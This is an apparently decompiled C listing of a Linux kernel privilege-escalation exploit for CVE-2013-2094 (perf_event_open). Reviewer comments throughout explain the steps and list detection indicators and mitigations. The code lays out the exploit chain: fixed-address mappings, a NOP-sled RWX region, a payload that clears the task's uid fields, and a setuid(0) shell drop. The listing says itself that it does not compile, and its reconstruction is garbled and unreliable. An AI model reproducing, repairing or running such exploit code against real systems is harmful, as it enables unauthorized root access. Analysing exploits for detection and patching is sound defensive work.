- #include<stdio.h>
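- //This listing does not compile.
- //CVE-2013-2094 (Linux kernel perf_event_open() local privilege escalation; the fix is a patched kernel)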
- int g_fd; // perf event descriptor: assigned in main() from perf_open(), closed in morte()
- void sc() { /* Stub that contains only a jump to the sc_next label.
-  * main() uses sc_start..sc_next as the bounds of a byte range to copy, but
-  * sc_start is not defined anywhere in this listing.
-  * NOTE(review): a second sc() is defined further down; the duplicate name is
-  * one of the reasons this listing cannot compile. */
- goto sc_next;
- sc_next:
- }
- void morte() { /* Signal handler: main() registers it for signal 0xe (SIGALRM) before alarm(2).
-  * Prints the string at raw address 0x401214 (its text is not on this page),
-  * closes the perf event descriptor g_fd, then calls dropshell().
-  * NOTE(review): dropshell() is called here before it is declared. */
- puts(0x401214);
- close(g_fd);
- dropshell();
- }
- void dropshell() { /* Post-exploitation step: sets the uid to 0 and execs a program.
-  * Every string argument is a raw address from the original binary (0x4011dd,
-  * 0x4011f1, 0x40120c, 0x401209); the strings themselves are not on this page.
-  * Detection: an unprivileged process whose uid becomes 0 and which then execs,
-  * with no setuid binary involved, is a strong privilege-escalation signal for
-  * audit and EDR rules. */
- setuid(0);
- errx(1, 0x4011dd); // as listed this always terminates the process, so the lines below are unreachable
- puts(0x4011f1);
- execl(0x40120c, 0x401209, NULL);
- exit(0);
- }
- int perf_open() { /* Issues syscall 0x12a, which is perf_event_open on x86-64 Linux, the
-  * system call affected by CVE-2013-2094, and returns its result.
-  * The attribute structure cannot be recovered from this listing: local_12 is
-  * only zeroed, and *local_12 (an int value, 0) is passed where a pointer to
-  * the structure is expected.
-  * main() calls perf_open(local_4), but no parameter is declared here, so that
-  * value is dropped.
-  * Mitigation: run a patched kernel; a seccomp policy that denies
-  * perf_event_open to workloads that do not need it reduces exposure to this
-  * bug class. */
- int local_12[0x50];
- memset(local_12, 0, 0x50); // clears 0x50 bytes, not all 0x50 ints of the array
- return syscall(0x12a, *local_12, 0, -1, -1, 0);
- }
- void sc_replace(char *a, char *b, int c) { /* Overwrites a 4-byte placeholder inside a 0x384-byte buffer.
-  * a: buffer to search; b: 4-byte pattern to locate; c: replacement value.
-  * Exits through errx() when the pattern is not found.
-  * NOTE(review): local_1 is never declared, main() passes integer constants
-  * (0xdeadbef0 and 0xdeadbef1) for b, and memcpy() receives the int local_4 as
-  * its source pointer, so this is not valid C as listed. */
- char *local_3 = a;
- char *local_3_4 = b;
- int local_4 = c;
- local_1 = memmem(local_3, 0x384, local_3_4, 4); // search window is fixed at 0x384 bytes
- if(local_1 == 0) {
- errx(1, "can't find %x", local_3_4);
- }
- memcpy(local_1, local_4, 4); // 4-byte in-place patch at the match
- }
- void trigger(int a) { /* Appears intended to raise the interrupt numbered a, then sleeps 3 seconds.
-  * a == 4 and a == 0x80: the branches are empty; only the comments "int 4" and
-  *   "int 0x80" remain, so the instruction itself is missing from this listing.
-  * a == 0: performs an integer division by zero.
-  * any other value: exits through errx() with "unknown intr".
-  * NOTE(review): local_2_4, local_1 and local_0_4 are undeclared here. */
- local_2_4 = a;
- if(local_2_4 != 4 ) {
- if(local_2_4 != 0x80) {
- if(local_2_4 == 0) {
- local_1 = 1;
- local_0_4 = 1;
- local_1 -= 1;
- //local_0_4 >> 16;
- local_1 = local_0_4 / local_1; // local_1 is 0 at this point: division by zero
- }else {
- errx(1, "unknown intr %d", local_2_4);
- }
- }else {
- //int 0x80 (instruction not present in the listing)
- }
- }else {
- //int 4 (instruction not present in the listing)
- }
- sleep(3);
- }
- int map_mem() { /* Creates a 0x10000000-byte (256 MiB) anonymous mapping and returns the result of mmap().
-  * prot 3 = PROT_READ|PROT_WRITE; flags 0x32 = MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS
-  * (Linux values); the fd argument 0xffffffff is -1.
-  * NOTE(review): local_3 (the requested address) is undeclared; main() passes
-  * an address argument, but no parameter is declared to receive it. The result
-  * is stored in an int, which cannot hold a 64-bit pointer. */
- int ret = mmap(local_3, 0x10000000, 3, 0x32, 0xffffffff, 0);
- if(ret == -1) { // mmap() failure
- err(1, "mmap()");
- }
- return ret;
- }
- void sc() { /* Second definition of sc(): the code that main() copies (as sym.sc, 0x384 bytes)
-  * into its executable mapping, after sc_replace() has overwritten the
-  * 0xdeadbef0 and 0xdeadbef1 placeholders.
-  * Visible steps: mask the address of a stack variable down to a 0x2000-byte
-  * boundary and load from it; step through offsets 0..0xf9f in units of 4,
-  * looking for two equal words whose top byte matches; then search 0x13 words
-  * for the second placeholder value and write 0.
-  * NOTE(review): this resembles a payload that clears identity fields of the
-  * current task; confirm against the original binary. Kernels running with
-  * SMEP/SMAP refuse to execute or access user-mapped pages from kernel mode,
-  * which blocks payloads staged in user memory this way.
-  * NOTE(review): declared void but returns 0, and pointer values are held in
-  * int variables, so this is not valid C as listed. */
- int i;
- int local_5 = *(&i & 0xffffffffffffe000); // load from the 0x2000-aligned base below the stack variable
- int local_4 = local_5 >> 24;
- int local_3 = 0xdeadbef0; // first placeholder; not used again in this function
- int local_2_4 = 0xdeadbef1; // second placeholder; the value searched for below
- i = 0;
- for(;i < 0xf9f; i += 4) {
- int *local_2 = &(*(local_5 + i));
- int local_1 = *local_2;
- if(*(local_2 + 2) == *local_2) {
- if(*local_2 >> 24 == local_4) {
- for(int j = 0;j < 0x13; j++) {
- if(*(local_1 + (j << 2)) == local_2_4) {
- i = 0;
- if(i <= 6) { // i was just set to 0, so this test is always true as listed
- *(((i + j) << 2) + local_1) = 0;
- return 0;
- }
- }
- }
- }
- }
- }
- }
- int find_mem(int *a, int b) { /* Searches the buffer a for the byte value b and returns the index of the match.
-  * Returns -1 once the loop ends; main() exits with an error message on -1.
-  * NOTE(review): local_1 and local_1_4 are undeclared, and local_1_4 is never
-  * advanced inside the loop, so as listed the function either returns 0 or
-  * does not terminate. */
- int *local_3 = a;
- char local_3_4 = (char)b; // only the low byte of b is compared
- local_1 = local_3;
- local_1_4 = 0;
- while(local_1_4 > -1) {
- if(*(local_1_4 + local_1) == local_3_4) {
- return local_1_4;
- }
- }
- return -1;
- }
- int main() { /* Driver. Visible sequence: map two 256 MiB regions at fixed addresses, open
-  * and close a perf event, scan the first region for a 0xff byte, compute an
-  * offset (the "sidt" comment marks an instruction missing from the listing),
-  * map a 32 MiB read/write/execute region filled with 0x90, copy and patch the
-  * sc code into it, arm a 2-second alarm handled by morte(), reopen the perf
-  * event and call trigger().
-  * Several identifiers are redeclared or never declared (for example local_4,
-  * v2, local_9_6, ebp, sc_start, sym.sc), so the arithmetic below cannot be
-  * trusted as a faithful reconstruction of the original binary.
-  * Static indicators: the three Romanian message strings below.
-  * Behavioural indicators: large MAP_FIXED anonymous mappings, an RWX mapping
-  * filled with 0x90, and perf_event_open issued by an unprivileged process. */
- puts("exploit local PRIVAT compilat de ps"); // Romanian banner, roughly "PRIVATE local exploit compiled by ps"
- puts("caut vulnerabilitatea..."); // Romanian, roughly "searching for the vulnerability..."
- int local_0_4 = 4; // interrupt number later passed to trigger()
- int local_1 = 4;
- void *local_4 = map_mem(0x380000000); // fixed-address argument; map_mem() as declared takes none
- void *v2 = map_mem(0x1780000000);
- memset(v2, 0x69, 0x10000000); // fills the second region with a known byte
- int local_4 = -1; // redeclares local_4 with a different type
- int v2 = 0; // redeclares v2 with a different type
- int v3 = perf_open(local_4);
- close(v3);
- void *v4;
- int v5 = find_mem(local_4, 0xff); // looks for a 0xff byte after the open/close above
- if(v5 == -1) {
- errx(1, "neah ... nu poti lua root pe asta"); // Romanian, roughly "nah ... you can't get root on this one"
- }
- int local_1 = 0x18; // redeclares local_1
- int v7 = 0x80000000;
- int v8 = 0x17;
- munmap(local_4, 0x10000000);
- munmap(v2, 0x10000000);
- v7 += v5;
- v7 -= local_4 * local_1; //-1 * local_1
- //sidt (instruction missing from the listing; it reads the IDT register, and UMIP keeps user mode from reading the real value)
- local_4 = v7 - *(ebp - local_9_6);
- local_4 -= v7 - *(ebp - local_9_6);
- if(local_4 % local_1 != 8) { // the remainder selects the interrupt number used by trigger()
- if(local_4 % local_1 != 0x10) {
- if(local_4 % local_1 == 0) {
- }else {
- errx(1, "remainder %d", local_1 % local_4);
- }
- }else{
- local_0_4 = 4;
- }
- }else {
- local_0_4 = 0x80;
- }
- local_4 -= local_0_4 << 4;
- if(local_1 % local4 != 0) {
- __assert_fail("(off % sz) == 0", 0x4012af, 0xf4, main)//? (0x4012af is a raw address standing in for a string argument)
- }
- local_13 = local_1
- local_2 = -local_4 / local_13; // overwritten by the next line
- local_2 = local_9_6 & 0xff000000;
- int ret = mmap(local_2, 0x2000000, 7, 0x32, 0xffffffff, 0); // prot 7 = read|write|execute, 32 MiB, MAP_FIXED
- if(ret == 0xff) { // compares against 0xff, not the mmap() failure value
- err(0, 1, "mmap()");
- }
- memset(local_2, 0x90, 0x2000000); // 0x90 is the x86 NOP opcode
- local_2 += 0x1fffc00; // moves to 0x400 bytes before the end of the region
- local_4_4 = sc_next - sc_start;
- memcpy(local_2, sc_start, local_4_4);
- local_2 += local_4_4;
- memcpy(local_2, sym.sc, 0x384); // same 0x384 length that sc_replace() searches
- sc_replace(local_2, 0xdeadbef0, getuid());
- sc_replace(local_2, 0xdeadbef1, getuid());
- signal(0xe, morte);//signal for alarm (0xe = SIGALRM); morte() runs when alarm(2) fires
- alarm(2);
- g_fd = perf_open(local_4);
- trigger(local_0_4);
- exit(0);
- return 0;
- }